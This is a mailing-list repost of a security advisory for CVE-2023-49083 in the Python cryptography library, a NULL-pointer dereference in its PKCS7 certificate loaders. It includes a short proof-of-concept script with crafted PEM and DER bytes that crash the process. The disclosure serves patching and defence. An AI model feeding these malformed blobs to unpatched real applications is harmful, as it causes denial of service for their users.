Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <ea180550-801c-4a6d-b8aa-dee79d76f17a@oracle.com>
Date: Wed, 29 Nov 2023 11:30:39 -0800
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: Python Cryptography advisory: CVE-2023-49083 NULL-dereference when
 loading PKCS7 certificates

https://github.com/pyca/cryptography/security/advisories/GHSA-jfhm-5ghh-2f97
reports:

-------------------------------------------------------------------------------
Affected versions >= 3.1, < 41.0.6
Patched versions >=41.0.6

Summary

Calling load_pem_pkcs7_certificates or load_der_pkcs7_certificates could lead to 
a NULL-pointer dereference and segfault.
PoC

Here is a Python code that triggers the issue:

from cryptography.hazmat.primitives.serialization.pkcs7 import 
load_der_pkcs7_certificates, load_pem_pkcs7_certificates

pem_p7 = b"""
-----BEGIN PKCS7-----
MAsGCSqGSIb3DQEHAg==
-----END PKCS7-----
"""

der_p7 = b"\x30\x0B\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x02"

load_pem_pkcs7_certificates(pem_p7)
load_der_pkcs7_certificates(der_p7)

Impact

Exploitation of this vulnerability poses a serious risk of Denial of Service 
(DoS) for any application attempting to deserialize a PKCS7 blob/certificate. 
The consequences extend to potential disruptions in system availability and 
stability.

-------------------------------------------------------------------------------

The fix was in https://github.com/pyca/cryptography/pull/9926

-- 
         -Alan Coopersmith-                 alan.coopersmith@...cle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.